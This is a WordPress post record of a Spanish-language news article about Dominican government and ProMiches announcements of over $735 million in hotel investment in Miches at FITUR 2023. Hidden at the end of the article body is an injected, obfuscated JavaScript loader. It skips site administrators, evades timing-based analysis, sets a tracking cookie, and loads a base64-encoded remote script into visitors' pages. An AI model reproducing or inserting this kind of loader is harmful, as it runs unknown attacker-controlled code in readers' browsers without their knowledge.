{"id":13468,"date":"2023-01-19T09:32:19","date_gmt":"2023-01-19T13:32:19","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13468"},"modified":"2023-01-19T09:32:19","modified_gmt":"2023-01-19T13:32:19","slug":"turismo-anuncia-inicio-de-nuevas-inversiones-en-miches-por-mas-de-735-millones-de-dolares","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13468","title":{"rendered":"Turismo anuncia inicio de nuevas inversiones en Miches por m\u00e1s de 735 millones de d\u00f3lares"},"content":{"rendered":"<p><strong>Madrid.<\/strong>\u2013 El Ministerio de\u00a0<strong>Turismo<\/strong>\u00a0y Promiches anunciaron el inicio de construcci\u00f3n de nuevos desarrollos hoteleros en el polo tur\u00edstico de Miches las cuales alcanzan m\u00e1s 735 millones de d\u00f3lares entre inversiones p\u00fablicas y privadas.<\/p>\n<p>En el marco de la Feria FITUR, el Ministerio de Turismo junto a ProMiches realizaron un desayuno de atracci\u00f3n de inversi\u00f3n para el destino Miches, presentando los avances tanto en materia de planificaci\u00f3n territorial, inversi\u00f3n p\u00fablica y proyectos privados que ya se est\u00e1n realizando en la zona.\u00a0 El ambiente de la Feria es el lugar id\u00f3neo para posicionar el pa\u00eds como destino seguro y estable para la inversi\u00f3n.<\/p>\n<div id=\"\" class=\"mmc_ads \">\n<div id=\"div-gpt-ad-7403699777382-mmc\" class=\"\" data-google-query-id=\"CN22sJ7e0_wCFUrmhwodtAwLyA\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_EyM_MediumBanner_InContent_1_0__container__\">El ministro de Turismo David Collado destac\u00f3 que desde el gobierno se est\u00e1 creando toda la infraestructura necesaria para que Miches se convierta en un polo tur\u00edstico exitoso. \u201cEn esta administraci\u00f3n, hemos dise\u00f1ado un Plan de Ordenamiento para Miches, y a trav\u00e9s del CEIZTUR e INAPA, hemos logrado construir las v\u00edas necesarias, los accesos a la playa y el acueducto en Miches para poder garantizar que los desarrollos hoteleros tengan la infraestructura p\u00fablica necesaria para su \u00e9xito operativo\u201d afirm\u00f3 el funcionario.<\/div>\n<\/div>\n<\/div>\n<p>La organizaci\u00f3n privada encargada de promover el desarrollo de Miches, Promiches, present\u00f3 las diferentes inversiones privadas, donde se destacan 3 hoteles ya en operaciones y varios m\u00e1s en proceso de construcci\u00f3n.<\/p>\n<p>\u201cEntre los diferentes proyectos privados tendremos m\u00e1s de 3,700 habitaciones hoteleras y casi 2 mil habitaciones residenciales, entre los proyectos en operaciones y en v\u00eda de construcci\u00f3n\u201d dijo Yamil Isa\u00edas, presidente de Promiches.<\/p>\n<p>Por su parte el Banco del Reservas inform\u00f3 que m\u00e1s de la mitad de las habitaciones en construcci\u00f3n en Miches est\u00e1n siendo financiadas por dicha instituci\u00f3n. \u201cel desarrollo tur\u00edstico de Miches comprende, a largo plazo, la puesta en servicio de 3,756 habitaciones hoteleras. De ese total, a trav\u00e9s de proyectos ya aprobados por nuestra instituci\u00f3n, ser\u00e1n habilitadas 2,020 habitaciones, m\u00e1s de la mitad de ese total\u201d dijo Samuel Pereyra, administrador del Banreservas.<\/p>\n<p>El gobierno dominicano firm\u00f3 en 2022 un acuerdo de colaboraci\u00f3n con ProMiches para el trabajo conjunto de inversi\u00f3n para el desarrollo de este polo tur\u00edstico y el mismo fue revalidado en ocasi\u00f3n de celebrarse en esta ciudad de Madrid la Feria Internacional de Turismo, FITUR 2023.<\/p>\n<p>Durante la celebraci\u00f3n de este desayuno de inversi\u00f3n, diferentes inversionistas presentaron sus proyectos dentro de los que se pueden mencionar, el proyecto ZEMI, del inversionista Fran El\u00edas Rainieri que tendr\u00e1 en su primera etapa un total de 534 habitaciones hoteleras y 1000 residenciales, el Proyecto del Grupo Viva Whyndham con 487 habitaciones hoteleras, presentado por el Sr. Rafael Blanco Canto; el de Grupo Tropicalia, representado por William Phelan y el proyecto de Grupo Maralda con 690 habitaciones hoteleras y 800 residenciales.<\/p>\n<p>El evento fue una clara demostraci\u00f3n de que la apuesta por Miches de parte de la Rep\u00fablica Dominicana es una realidad, y se inform\u00f3 que se continuar\u00e1n los esfuerzos mancomunados p\u00fablicos y privados para que este destino pueda alcanzar su desarrollo en el menor tiempo posible.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Madrid.\u2013 El Ministerio de\u00a0Turismo\u00a0y Promiches anunciaron el inicio de construcci\u00f3n de nuevos desarrollos hoteleros en el polo tur\u00edstico de Miches las cuales alcanzan m\u00e1s 735 millones de d\u00f3lares entre inversiones p\u00fablicas y privadas. En el marco de la Feria FITUR, el Ministerio de Turismo junto a ProMiches realizaron un desayuno de atracci\u00f3n de inversi\u00f3n para [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13470,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13468","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13468","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13468"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13468\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13470"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13468"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13468"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}